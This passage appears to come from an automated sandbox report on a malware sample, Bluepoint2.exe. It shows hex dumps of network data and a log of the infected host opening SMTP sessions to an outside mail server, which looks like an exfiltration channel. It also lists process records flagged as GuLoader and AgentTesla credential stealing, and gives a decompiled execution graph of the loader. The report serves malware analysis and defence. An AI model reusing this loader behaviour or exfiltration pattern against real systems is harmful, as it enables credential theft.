                                                                                                                                  2022-05-12 17:41:27 UTC209INData Raw: 7d 12 80 4c 34 e0 ee d4 27 e9 8f d2 49 3e c4 ce 34 f0 53 98 47 8c 07 46 b3 f1 01 fa 38 63 60 18 22 ca 07 26 c5 a9 69 96 55 6b 63 43 25 b4 a5 e5 10 b8 49 d8 b3 ee 98 3f b2 7f 44 ce 41 b5 f9 6f a9 dd 41 52 2b 6e 1c ef 8c 1b fe 32 53 03 e9 fe 8b c6 fd 6a d3 31 4a 01 ae 75 ff c8 71 58 f4 d8 4f 55 48 01 1a 80 ce a8 92 a5 b6 6d e8 a8 40 af 0c 3d 66 f3 02 3b 32 3c cd 8d 02 dc 16 b4 d5 b6 f3 67 68 1a 1f c6 5c 18 13 b1 f4 20 bd 9e 68 ba 57 ed 7b 69 f7 e1 cf 29 ff 16 26 05 6f 73 c8 b2 4b f1 2b eb 5c 7a 32 87 6b 9a c1 32 59 26 29 b7 d0 44 ab 5f 82 10 a6 10 16 50 10 70 18 ce f8 1a 39 6c 45 e6 e0 a9 42 2e 87 ad b5 24 d7 8b 62 e3 74 f4 1c ee ad a6 d5 d6 ec 98 7a 66 ef 5a 12 9e 5c 8f 42 99 e5 f5 77 3f a6 ca 28 4e 2c 88 48 f5 5a a5 ab 02 41 16 3f 24 20 0e 68 7c cb da 4b
                                                                                                                                  Data Ascii: }L4'I>4SGF8c`"&iUkcC%I?DAoAR+n2Sj1JuqXOUHm@=f;2<gh\ hW{i)&osK+\z2k2Y&)D_Pp9lEB.$btzfZ\Bw?(N,HZA?$ h|K
                                                                                                                                  2022-05-12 17:41:27 UTC210INData Raw: 46 bf c9 8b d1 bc de 01 1f bc bb 40 93 bf 26 a6 bb ff 0e 52 4c 98 4e 79 76 66 94 2e a1 c9 51 4e b6 7b d9 64 b4 9b 34 e3 34 7e 9f fd 26 62 82 b8 e4 e9 1b c1 37 f3 54 6b 5d 75 28 49 4a b6 a7 dc 9e d9 e4 80 6e ec 17 69 ff 36 be 66 09 15 83 b6 c7 6d d2 20 7a 07 06 5d 3d c6 ff 2b f0 4f 05 41 95 a6 4e b4 96 8a ba 34 62 e1 5a 03 c4 19 3a 53 e6 eb 45 46 f8 ea 40 10 a6 30 29 92 cb ca c3 bd f3 97 38 a9 7c 46 a7 51 3a e3 fc d4 c8 66 5a 36 67 35 eb 86 8d f1 bc 93 07 e9 fc 06 c1 9a ef 2e 30 4a 03 23 71 c3 c3 77 4d ec d5 49 5a cb ed 03 a8 d2 a7 93 ba 85 78 7c b5 40 5a d9 21 77 6f 16 28 20 34 c3 10 dd da 04 37 cf 39 1b 67 6e 3a 05 d9 47 04 9d 71 fb 20 bd 9e 6f dd c5 45 72 73 6b e7 da 3b ec 09 21 2b 7f ec cf a1 57 61 a0 6a 5d 6f 40 9b e4 c8 c1 34 5a 2e 1f be d1 5f b7 d7
                                                                                                                                  Data Ascii: F@&RLNyvf.QN{d44~&b7Tk]u(IJni6fm z]=+OAN4bZ:SEF@0)8|FQ:fZ6g5.0J#qwMIZx|@Z!wo( 479gn:Gq oErsk;!+Waj]o@4Z._
                                                                                                                                  2022-05-12 17:41:27 UTC211INData Raw: 32 f4 f8 16 17 ae 44 c0 ba 39 7e b7 77 35 d9 34 e4 33 a7 96 04 b8 4b c1 e2 38 0e 72 79 65 6a 35 6b 86 a9 f0 f3 8e 7f 7c d0 80 f8 ea f0 7e c3 14 a6 52 a0 75 d7 a1 ba 7e 0b 4d 20 15 2c 14 e1 82 3b 11 6f d3 2f db ae 87 5e b5 f9 69 6f 1e 69 fd 5e fa f2 86 e3 6c fd 74 44 fa a7 da 08 78 30 21 98 f0 57 ca 0b 6d bf e0 d3 45 ce 53 c4 9a 0a 3b 13 c2 ff ab ca e5 08 a1 9c e9 4d 06 78 27 8e 69 4d 02 35 60 32 af d7 2a 54 e0 1a ae c6 8c 1c 91 d7 6c 37 7b 44 a8 39 1d dd fe e3 8c 70 16 5e f7 70 0d 8c d2 7b c8 45 21 c4 74 31 ad 08 f3 62 ad 7f 18 e5 85 a2 e3 cd c1 51 f4 fb 1b 44 03 86 dc fc ba 1f f0 56 df 6d 56 10 42 e3 43 4a cd c2 80 97 d0 ce e6 c7 3c 22 31 63 38 f2 3e fd 28 2f 83 4b 55 66 84 c2 78 e3 e2 5d 49 7d 0b ca 36 f0 94 97 6e 5b eb 60 31 41 68 bd 6c e7 2f 45 5f e3
                                                                                                                                  Data Ascii: 2D9~w543K8ryej5k|~Ru~M ,;o/^ioi^ltDx0!WmES;Mx'iM5`2*Tl7{D9p^p{E!t1bQDVmVBCJ<"1c8>(/KUfx]I}6n[`1Ahl/E_
                                                                                                                                  2022-05-12 17:41:27 UTC212INData Raw: 1b 8a c6 b7 0e 58 ab 6a 78 23 9b d8 0a 2e 69 fb 0f a6 cf 20 c4 81 83 12 14 b8 c9 0e 01 71 73 20 98 0a 48 18 12 64 e0 20 bc 4b 7c ba 56 38 74 75 78 e7 d5 b5 15 18 a9 e2 73 e3 40 49 51 7e 2d f1 d4 84 5a 90 f7 ce db bb 5a 3b 2a ab 5e a6 b8 52 82 1c 2a 6d 16 56 33 79 04 41 04 90 41 6a 47 f0 fc 27 97 27 91 2c bc 3a d1 81 5b e5 62 e2 06 6e 74 a6 d7 59 ec 85 66 c1 35 50 15 0d d4 5c 4d 85 6a f3 70 ad c2 05 a8 3c bf f5 4e e9 d7 de 39 6d 31 01 a1 50 20 0e 68 73 bb c0 d6 20 51 f2 40 d5 82 ea c9 36 fb 13 a5 b5 00 4a 0c 47 4f 12 ad 66 97 58 30 7c 12 3a 35 44 ca ad 7e b2 78 09 35 9c d1 c5 fc d9 ed 1f be e2 2b 7f d4 3c 71 85 b1 f1 ea a3 35 9a e5 c5 d5 72 dc 9f cb ac bf 86 2c e2 79 29 cd 39 6d db 5a 1e c0 45 7a 2c 5a f3 4b 2f 79 c7 30 7a e8 15 0e 33 c0 05 53 13 53 b2 3a
                                                                                                                                  Data Ascii: Xjx#.i qs Hd K|V8tuxs@IQ~-ZZ;*^R*mV3yAAjG'',:[bntYf5P\Mjp<N9m1P hs Q@6JGOfX0|:5D~x5+<q5r,y)9mZEz,ZK/y0z3SS:
                                                                                                                                  2022-05-12 17:41:27 UTC213INData Raw: ad 45 18 85 85 88 e3 e5 c1 65 f4 a9 1b 3f 03 d0 dc a8 ba 05 f0 64 df 52 56 28 42 d5 43 68 cd cf 80 84 d0 d3 e6 d0 3c 2d 31 63 38 f2 3e e0 28 45 83 00 55 0a 84 cf 78 91 e2 33 49 42 0b c9 36 eb 94 83 6e 46 eb 7b 31 56 68 a6 6c d9 2f 55 5f f5 32 6e 1f d4 8e df a7 a8 e8 34 13 17 25 0a db 33 5d a8 b7 15 57 9b 3d d5 29 77 63 3f cc 82 b1 23 01 36 d7 37 66 92 ef f7 c0 e2 9b a1 26 f8 4f 9c 9a 97 2a fb d5 05 a0 d4 af 4f 6c 2e 4e 3e 87 30 b1 a2 99 50 b4 f8 74 05 c9 bd 40 c1 b1 5a b7 57 7e 5e 55 37 8d 3f f9 df 67 d0 af cc db a2 c6 cb 6e a2 e4 06 9a 48 62 3c 70 bd 7c 00 6c bc bb df f8 a8 f8 1b fd 71 79 df 90 12 47 4c a3 b7 5f e6 db 99 8e 15 e2 7a 4a 95 3a d2 73 77 95 27 b7 f5 ec 8c 35 0d 87 a9 5c 5c 47 9e 36 91 41 77 4f 87 27 76 a6 cd 82 97 3a 5e 60 3b 23 ed 12 04 46
                                                                                                                                  Data Ascii: Ee?dRV(BCh<-1c8>(EUx3IB6nF{1Vhl/U_2n4%3]W=)wc?#67f&O*Ol.N>0Pt@ZW~^U7?gnHb<p|lqyGL_zJ:sw'5\\G6AwO'v:^`;#F


                                                                                                                                  SMTP Packets

                                                                                                                                  TimestampSource PortDest PortSource IPDest IPCommands
                                                                                                                                  May 12, 2022 19:41:35.648189068 CEST5874978381.25.126.48192.168.11.20220 ce2020050617001.dnssw.net ESMTP Postfix (Debian/GNU)
                                                                                                                                  May 12, 2022 19:41:35.648559093 CEST49783587192.168.11.2081.25.126.48EHLO 445817
                                                                                                                                  May 12, 2022 19:41:35.690192938 CEST5874978381.25.126.48192.168.11.20250-ce2020050617001.dnssw.net
                                                                                                                                  250-PIPELINING
                                                                                                                                  250-SIZE 51200000
                                                                                                                                  250-ETRN
                                                                                                                                  250-STARTTLS
                                                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                                                  250-AUTH=PLAIN LOGIN
                                                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                                                  250-8BITMIME
                                                                                                                                  250-DSN
                                                                                                                                  250-SMTPUTF8
                                                                                                                                  250 CHUNKING
                                                                                                                                  May 12, 2022 19:41:35.690509081 CEST49783587192.168.11.2081.25.126.48STARTTLS
                                                                                                                                  May 12, 2022 19:41:35.732141018 CEST5874978381.25.126.48192.168.11.20220 2.0.0 Ready to start TLS
                                                                                                                                  May 12, 2022 19:41:38.619878054 CEST5874978681.25.126.48192.168.11.20220 ce2020050617001.dnssw.net ESMTP Postfix (Debian/GNU)
                                                                                                                                  May 12, 2022 19:41:38.620347977 CEST49786587192.168.11.2081.25.126.48EHLO 445817
                                                                                                                                  May 12, 2022 19:41:38.662025928 CEST5874978681.25.126.48192.168.11.20250-ce2020050617001.dnssw.net
                                                                                                                                  250-PIPELINING
                                                                                                                                  250-SIZE 51200000
                                                                                                                                  250-ETRN
                                                                                                                                  250-STARTTLS
                                                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                                                  250-AUTH=PLAIN LOGIN
                                                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                                                  250-8BITMIME
                                                                                                                                  250-DSN
                                                                                                                                  250-SMTPUTF8
                                                                                                                                  250 CHUNKING
                                                                                                                                  May 12, 2022 19:41:38.662394047 CEST49786587192.168.11.2081.25.126.48STARTTLS
                                                                                                                                  May 12, 2022 19:41:38.704106092 CEST5874978681.25.126.48192.168.11.20220 2.0.0 Ready to start TLS

                                                                                                                                  Statistics

                                                                                                                                  CPU Usage

                                                                                                                                  Click to jump to process

                                                                                                                                  Memory Usage

                                                                                                                                  Click to jump to process

                                                                                                                                  High Level Behavior Distribution

                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                  Behavior

                                                                                                                                  Click to jump to process

                                                                                                                                  System Behavior

                                                                                                                                  General

                                                                                                                                  Target ID:2
                                                                                                                                  Start time:19:40:14
                                                                                                                                  Start date:12/05/2022
                                                                                                                                  Path:C:\Users\user\Desktop\Bluepoint2.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:"C:\Users\user\Desktop\Bluepoint2.exe"
                                                                                                                                  Imagebase:0x400000
                                                                                                                                  File size:184424 bytes
                                                                                                                                  MD5 hash:C792C744DDE586C896D6CA8CCEB0E04A
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.84107890317.0000000003350000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  Reputation:low

                                                                                                                                  General

                                                                                                                                  Target ID:10
                                                                                                                                  Start time:19:40:48
                                                                                                                                  Start date:12/05/2022
                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:"C:\Users\user\Desktop\Bluepoint2.exe"
                                                                                                                                  Imagebase:0x100000
                                                                                                                                  File size:106496 bytes
                                                                                                                                  MD5 hash:7BAE06CBE364BB42B8C34FCFB90E3EBD
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:moderate

                                                                                                                                  General

                                                                                                                                  Target ID:11
                                                                                                                                  Start time:19:40:48
                                                                                                                                  Start date:12/05/2022
                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:"C:\Users\user\Desktop\Bluepoint2.exe"
                                                                                                                                  Imagebase:0xc00000
                                                                                                                                  File size:106496 bytes
                                                                                                                                  MD5 hash:7BAE06CBE364BB42B8C34FCFB90E3EBD
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000B.00000000.83700958185.0000000001000000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.88417087670.000000001DA31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.88417087670.000000001DA31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  Reputation:moderate

                                                                                                                                  General

                                                                                                                                  Target ID:12
                                                                                                                                  Start time:19:40:48
                                                                                                                                  Start date:12/05/2022
                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                  Imagebase:0x7ff6da810000
                                                                                                                                  File size:875008 bytes
                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:moderate

                                                                                                                                  Disassembly

                                                                                                                                  Reset < >

                                                                                                                                    Execution Graph

                                                                                                                                    Execution Coverage:13.7%
                                                                                                                                    Dynamic/Decrypted Code Coverage:10.8%
                                                                                                                                    Signature Coverage:20.1%
                                                                                                                                    Total number of Nodes:1800
                                                                                                                                    Total number of Limit Nodes:47
                                                                                                                                    execution_graph 5509 403640 SetErrorMode GetVersionExW 5510 403692 GetVersionExW 5509->5510 5511 4036ca 5509->5511 5510->5511 5512 403723 5511->5512 5513 406a35 5 API calls 5511->5513 5600 4069c5 GetSystemDirectoryW 5512->5600 5513->5512 5515 403739 lstrlenA 5515->5512 5516 403749 5515->5516 5603 406a35 GetModuleHandleA 5516->5603 5519 406a35 5 API calls 5520 403757 5519->5520 5521 406a35 5 API calls 5520->5521 5522 403763 #17 OleInitialize SHGetFileInfoW 5521->5522 5609 406668 lstrcpynW 5522->5609 5525 4037b0 GetCommandLineW 5610 406668 lstrcpynW 5525->5610 5527 4037c2 5611 405f64 5527->5611 5530 4038f7 5531 40390b GetTempPathW 5530->5531 5615 40360f 5531->5615 5533 403923 5534 403927 GetWindowsDirectoryW lstrcatW 5533->5534 5535 40397d DeleteFileW 5533->5535 5537 40360f 12 API calls 5534->5537 5625 4030d0 GetTickCount GetModuleFileNameW 5535->5625 5536 405f64 CharNextW 5539 4037f9 5536->5539 5540 403943 5537->5540 5539->5530 5539->5536 5543 4038f9 5539->5543 5540->5535 5542 403947 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 5540->5542 5541 403990 5549 405f64 CharNextW 5541->5549 5572 403a54 5541->5572 5585 403a45 5541->5585 5545 40360f 12 API calls 5542->5545 5711 406668 lstrcpynW 5543->5711 5548 403975 5545->5548 5548->5535 5548->5572 5556 4039b2 5549->5556 5551 403b91 5554 403b99 GetCurrentProcess OpenProcessToken 5551->5554 5555 403c0f ExitProcess 5551->5555 5552 403b7c 5774 405cc8 5552->5774 5561 403bb0 LookupPrivilegeValueW AdjustTokenPrivileges 5554->5561 5562 403bdf 5554->5562 5558 403a1b 5556->5558 5559 403a5c 5556->5559 5712 40603f 5558->5712 5728 405c33 5559->5728 5561->5562 5564 406a35 5 API calls 5562->5564 5568 403be6 5564->5568 5571 403bfb ExitWindowsEx 5568->5571 5575 403c08 5568->5575 5569 403a72 lstrcatW 5570 403a7d lstrcatW lstrcmpiW 5569->5570 5570->5572 5573 403a9d 5570->5573 5571->5555 5571->5575 5765 403c25 5572->5765 5577 403aa2 5573->5577 5578 403aa9 5573->5578 5778 40140b 5575->5778 5731 405b99 CreateDirectoryW 5577->5731 5736 405c16 CreateDirectoryW 5578->5736 5579 403a3a 5727 406668 lstrcpynW 5579->5727 5584 403aae SetCurrentDirectoryW 5586 403ac0 5584->5586 5587 403acb 5584->5587 5655 403d17 5585->5655 5739 406668 lstrcpynW 5586->5739 5740 406668 lstrcpynW 5587->5740 5592 403b19 CopyFileW 5597 403ad8 5592->5597 5593 403b63 5595 406428 36 API calls 5593->5595 5595->5572 5596 4066a5 17 API calls 5596->5597 5597->5593 5597->5596 5599 403b4d CloseHandle 5597->5599 5741 4066a5 5597->5741 5758 406428 MoveFileExW 5597->5758 5762 405c4b CreateProcessW 5597->5762 5599->5597 5601 4069e7 wsprintfW LoadLibraryExW 5600->5601 5601->5515 5604 406a51 5603->5604 5605 406a5b GetProcAddress 5603->5605 5606 4069c5 3 API calls 5604->5606 5607 403750 5605->5607 5608 406a57 5606->5608 5607->5519 5608->5605 5608->5607 5609->5525 5610->5527 5612 405f6a 5611->5612 5613 4037e8 CharNextW 5612->5613 5614 405f71 CharNextW 5612->5614 5613->5539 5614->5612 5781 4068ef 5615->5781 5617 403625 5617->5533 5618 40361b 5618->5617 5790 405f37 lstrlenW CharPrevW 5618->5790 5621 405c16 2 API calls 5622 403633 5621->5622 5793 406187 5622->5793 5797 406158 GetFileAttributesW CreateFileW 5625->5797 5627 403113 5654 403120 5627->5654 5798 406668 lstrcpynW 5627->5798 5629 403136 5799 405f83 lstrlenW 5629->5799 5633 403147 GetFileSize 5648 403241 5633->5648 5653 40315e 5633->5653 5637 403286 GlobalAlloc 5640 40329d 5637->5640 5639 4032de 5642 40302e 32 API calls 5639->5642 5644 406187 2 API calls 5640->5644 5641 403267 5643 4035e2 ReadFile 5641->5643 5642->5654 5645 403272 5643->5645 5647 4032ae CreateFileW 5644->5647 5645->5637 5645->5654 5646 40302e 32 API calls 5646->5653 5649 4032e8 5647->5649 5647->5654 5804 40302e 5648->5804 5819 4035f8 SetFilePointer 5649->5819 5651 4032f6 5820 403371 5651->5820 5653->5639 5653->5646 5653->5648 5653->5654 5835 4035e2 5653->5835 5654->5541 5656 406a35 5 API calls 5655->5656 5657 403d2b 5656->5657 5658 403d31 GetUserDefaultUILanguage 5657->5658 5659 403d43 5657->5659 5882 4065af wsprintfW 5658->5882 5891 406536 5659->5891 5662 403d41 5883 403fed 5662->5883 5664 403d92 lstrcatW 5664->5662 5666 406536 3 API calls 5666->5664 5668 40603f 18 API calls 5669 403dc4 5668->5669 5670 403e58 5669->5670 5672 406536 3 API calls 5669->5672 5671 40603f 18 API calls 5670->5671 5673 403e5e 5671->5673 5674 403df6 5672->5674 5675 403e6e LoadImageW 5673->5675 5676 4066a5 17 API calls 5673->5676 5674->5670 5680 403e17 lstrlenW 5674->5680 5684 405f64 CharNextW 5674->5684 5677 403f14 5675->5677 5678 403e95 RegisterClassW 5675->5678 5676->5675 5679 40140b 2 API calls 5677->5679 5681 403f1e 5678->5681 5682 403ecb SystemParametersInfoW CreateWindowExW 5678->5682 5683 403f1a 5679->5683 5685 403e25 lstrcmpiW 5680->5685 5686 403e4b 5680->5686 5681->5572 5682->5677 5683->5681 5691 403fed 18 API calls 5683->5691 5688 403e14 5684->5688 5685->5686 5689 403e35 GetFileAttributesW 5685->5689 5687 405f37 3 API calls 5686->5687 5692 403e51 5687->5692 5688->5680 5690 403e41 5689->5690 5690->5686 5693 405f83 2 API calls 5690->5693 5694 403f2b 5691->5694 5896 406668 lstrcpynW 5692->5896 5693->5686 5696 403f37 ShowWindow 5694->5696 5697 403fba 5694->5697 5699 4069c5 3 API calls 5696->5699 5897 40579d OleInitialize 5697->5897 5701 403f4f 5699->5701 5700 403fc0 5702 403fc4 5700->5702 5703 403fdc 5700->5703 5704 403f5d GetClassInfoW 5701->5704 5706 4069c5 3 API calls 5701->5706 5702->5681 5709 40140b 2 API calls 5702->5709 5705 40140b 2 API calls 5703->5705 5707 403f71 GetClassInfoW RegisterClassW 5704->5707 5708 403f87 DialogBoxParamW 5704->5708 5705->5681 5706->5704 5707->5708 5710 40140b 2 API calls 5708->5710 5709->5681 5710->5681 5711->5531 5919 406668 lstrcpynW 5712->5919 5714 406050 5920 405fe2 CharNextW CharNextW 5714->5920 5717 403a27 5717->5572 5726 406668 lstrcpynW 5717->5726 5718 4068ef 5 API calls 5719 406066 5718->5719 5719->5717 5720 406097 lstrlenW 5719->5720 5725 405f83 2 API calls 5719->5725 5926 40699e FindFirstFileW 5719->5926 5720->5719 5721 4060a2 5720->5721 5723 405f37 3 API calls 5721->5723 5724 4060a7 GetFileAttributesW 5723->5724 5724->5717 5725->5720 5726->5579 5727->5585 5729 406a35 5 API calls 5728->5729 5730 403a61 lstrcatW 5729->5730 5730->5569 5730->5570 5732 403aa7 5731->5732 5733 405bea GetLastError 5731->5733 5732->5584 5733->5732 5734 405bf9 SetFileSecurityW 5733->5734 5734->5732 5735 405c0f GetLastError 5734->5735 5735->5732 5737 405c26 5736->5737 5738 405c2a GetLastError 5736->5738 5737->5584 5738->5737 5739->5587 5740->5597 5745 4066b2 5741->5745 5742 4068d5 5743 403b0d DeleteFileW 5742->5743 5931 406668 lstrcpynW 5742->5931 5743->5592 5743->5597 5745->5742 5746 4068a3 lstrlenW 5745->5746 5748 406536 3 API calls 5745->5748 5749 4066a5 10 API calls 5745->5749 5750 4067ba GetSystemDirectoryW 5745->5750 5752 4067cd GetWindowsDirectoryW 5745->5752 5753 4066a5 10 API calls 5745->5753 5754 406844 lstrcatW 5745->5754 5755 4068ef 5 API calls 5745->5755 5756 4067fc SHGetSpecialFolderLocation 5745->5756 5929 4065af wsprintfW 5745->5929 5930 406668 lstrcpynW 5745->5930 5746->5745 5748->5745 5749->5746 5750->5745 5752->5745 5753->5745 5754->5745 5755->5745 5756->5745 5757 406814 SHGetPathFromIDListW CoTaskMemFree 5756->5757 5757->5745 5759 406449 5758->5759 5760 40643c 5758->5760 5759->5597 5932 4062ae 5760->5932 5763 405c8a 5762->5763 5764 405c7e CloseHandle 5762->5764 5763->5597 5764->5763 5766 403c40 5765->5766 5767 403c36 CloseHandle 5765->5767 5768 403c54 5766->5768 5769 403c4a CloseHandle 5766->5769 5767->5766 5966 403c82 5768->5966 5769->5768 5777 405cdd 5774->5777 5775 403b89 ExitProcess 5776 405cf1 MessageBoxIndirectW 5776->5775 5777->5775 5777->5776 5779 401389 2 API calls 5778->5779 5780 401420 5779->5780 5780->5555 5788 4068fc 5781->5788 5782 406977 CharPrevW 5786 406972 5782->5786 5783 406965 CharNextW 5783->5786 5783->5788 5784 406998 5784->5618 5785 405f64 CharNextW 5785->5788 5786->5782 5786->5784 5787 406951 CharNextW 5787->5788 5788->5783 5788->5785 5788->5786 5788->5787 5789 406960 CharNextW 5788->5789 5789->5783 5791 405f53 lstrcatW 5790->5791 5792 40362d 5790->5792 5791->5792 5792->5621 5794 406194 GetTickCount GetTempFileNameW 5793->5794 5795 40363e 5794->5795 5796 4061ca 5794->5796 5795->5533 5796->5794 5796->5795 5797->5627 5798->5629 5800 405f91 5799->5800 5801 40313c 5800->5801 5802 405f97 CharPrevW 5800->5802 5803 406668 lstrcpynW 5801->5803 5802->5800 5802->5801 5803->5633 5805 403057 5804->5805 5806 40303f 5804->5806 5808 403067 GetTickCount 5805->5808 5809 40305f 5805->5809 5807 403048 DestroyWindow 5806->5807 5812 40304f 5806->5812 5807->5812 5811 403075 5808->5811 5808->5812 5839 406a71 5809->5839 5813 4030aa CreateDialogParamW ShowWindow 5811->5813 5814 40307d 5811->5814 5812->5637 5812->5654 5838 4035f8 SetFilePointer 5812->5838 5813->5812 5814->5812 5843 403012 5814->5843 5816 40308b wsprintfW 5846 4056ca 5816->5846 5819->5651 5821 403380 SetFilePointer 5820->5821 5822 40339c 5820->5822 5821->5822 5857 403479 GetTickCount 5822->5857 5825 403439 5825->5654 5828 403479 42 API calls 5829 4033d3 5828->5829 5829->5825 5830 40343f ReadFile 5829->5830 5832 4033e2 5829->5832 5830->5825 5832->5825 5833 4061db ReadFile 5832->5833 5872 40620a WriteFile 5832->5872 5833->5832 5836 4061db ReadFile 5835->5836 5837 4035f5 5836->5837 5837->5653 5838->5641 5840 406a8e PeekMessageW 5839->5840 5841 406a84 DispatchMessageW 5840->5841 5842 406a9e 5840->5842 5841->5840 5842->5812 5844 403021 5843->5844 5845 403023 MulDiv 5843->5845 5844->5845 5845->5816 5847 4056e5 5846->5847 5848 4030a8 5846->5848 5849 405701 lstrlenW 5847->5849 5850 4066a5 17 API calls 5847->5850 5848->5812 5851 40572a 5849->5851 5852 40570f lstrlenW 5849->5852 5850->5849 5854 405730 SetWindowTextW 5851->5854 5855 40573d 5851->5855 5852->5848 5853 405721 lstrcatW 5852->5853 5853->5851 5854->5855 5855->5848 5856 405743 SendMessageW SendMessageW SendMessageW 5855->5856 5856->5848 5858 4035d1 5857->5858 5859 4034a7 5857->5859 5860 40302e 32 API calls 5858->5860 5874 4035f8 SetFilePointer 5859->5874 5867 4033a3 5860->5867 5862 4034b2 SetFilePointer 5866 4034d7 5862->5866 5863 4035e2 ReadFile 5863->5866 5865 40302e 32 API calls 5865->5866 5866->5863 5866->5865 5866->5867 5868 40620a WriteFile 5866->5868 5869 4035b2 SetFilePointer 5866->5869 5875 406bb0 5866->5875 5867->5825 5870 4061db ReadFile 5867->5870 5868->5866 5869->5858 5871 4033bc 5870->5871 5871->5825 5871->5828 5873 406228 5872->5873 5873->5832 5874->5862 5876 406bd5 5875->5876 5877 406bdd 5875->5877 5876->5866 5877->5876 5878 406c64 GlobalFree 5877->5878 5879 406c6d GlobalAlloc 5877->5879 5880 406ce4 GlobalAlloc 5877->5880 5881 406cdb GlobalFree 5877->5881 5878->5879 5879->5876 5879->5877 5880->5876 5880->5877 5881->5880 5882->5662 5884 404001 5883->5884 5904 4065af wsprintfW 5884->5904 5886 404072 5905 4040a6 5886->5905 5888 403da2 5888->5668 5889 404077 5889->5888 5890 4066a5 17 API calls 5889->5890 5890->5889 5908 4064d5 5891->5908 5894 40656a RegQueryValueExW RegCloseKey 5895 403d73 5894->5895 5895->5664 5895->5666 5896->5670 5912 404610 5897->5912 5899 4057c0 5903 4057e7 5899->5903 5915 401389 5899->5915 5900 404610 SendMessageW 5901 4057f9 OleUninitialize 5900->5901 5901->5700 5903->5900 5904->5886 5906 4066a5 17 API calls 5905->5906 5907 4040b4 SetWindowTextW 5906->5907 5907->5889 5909 4064e4 5908->5909 5910 4064ed RegOpenKeyExW 5909->5910 5911 4064e8 5909->5911 5910->5911 5911->5894 5911->5895 5913 404628 5912->5913 5914 404619 SendMessageW 5912->5914 5913->5899 5914->5913 5917 401390 5915->5917 5916 4013fe 5916->5899 5917->5916 5918 4013cb MulDiv SendMessageW 5917->5918 5918->5917 5919->5714 5921 406011 5920->5921 5922 405fff 5920->5922 5924 405f64 CharNextW 5921->5924 5925 406035 5921->5925 5922->5921 5923 40600c CharNextW 5922->5923 5923->5925 5924->5921 5925->5717 5925->5718 5927 4069b4 FindClose 5926->5927 5928 4069bf 5926->5928 5927->5928 5928->5719 5929->5745 5930->5745 5931->5743 5933 406304 GetShortPathNameW 5932->5933 5934 4062de 5932->5934 5936 406423 5933->5936 5937 406319 5933->5937 5959 406158 GetFileAttributesW CreateFileW 5934->5959 5936->5759 5937->5936 5939 406321 wsprintfA 5937->5939 5938 4062e8 CloseHandle GetShortPathNameW 5938->5936 5940 4062fc 5938->5940 5941 4066a5 17 API calls 5939->5941 5940->5933 5940->5936 5942 406349 5941->5942 5960 406158 GetFileAttributesW CreateFileW 5942->5960 5944 406356 5944->5936 5945 406365 GetFileSize GlobalAlloc 5944->5945 5946 406387 5945->5946 5947 40641c CloseHandle 5945->5947 5948 4061db ReadFile 5946->5948 5947->5936 5949 40638f 5948->5949 5949->5947 5961 4060bd lstrlenA 5949->5961 5952 4063a6 lstrcpyA 5956 4063c8 5952->5956 5953 4063ba 5954 4060bd 4 API calls 5953->5954 5954->5956 5955 4063ff SetFilePointer 5957 40620a WriteFile 5955->5957 5956->5955 5958 406415 GlobalFree 5957->5958 5958->5947 5959->5938 5960->5944 5962 4060fe lstrlenA 5961->5962 5963 406106 5962->5963 5964 4060d7 lstrcmpiA 5962->5964 5963->5952 5963->5953 5964->5963 5965 4060f5 CharNextA 5964->5965 5965->5962 5967 403c90 5966->5967 5968 403c59 5967->5968 5969 403c95 FreeLibrary GlobalFree 5967->5969 5970 405d74 5968->5970 5969->5968 5969->5969 5971 40603f 18 API calls 5970->5971 5972 405d94 5971->5972 5973 405db3 5972->5973 5974 405d9c DeleteFileW 5972->5974 5976 405ede 5973->5976 6010 406668 lstrcpynW 5973->6010 5978 403b71 OleUninitialize 5974->5978 5976->5978 5981 40699e 2 API calls 5976->5981 5977 405dd9 5979 405dec 5977->5979 5980 405ddf lstrcatW 5977->5980 5978->5551 5978->5552 5983 405f83 2 API calls 5979->5983 5982 405df2 5980->5982 5986 405ef8 5981->5986 5984 405e02 lstrcatW 5982->5984 5985 405df8 5982->5985 5983->5982 5987 405e0d lstrlenW FindFirstFileW 5984->5987 5985->5984 5985->5987 5986->5978 5988 405efc 5986->5988 5989 405ed3 5987->5989 6008 405e2f 5987->6008 5990 405f37 3 API calls 5988->5990 5989->5976 5991 405f02 5990->5991 5993 405d2c 5 API calls 5991->5993 5992 405eb6 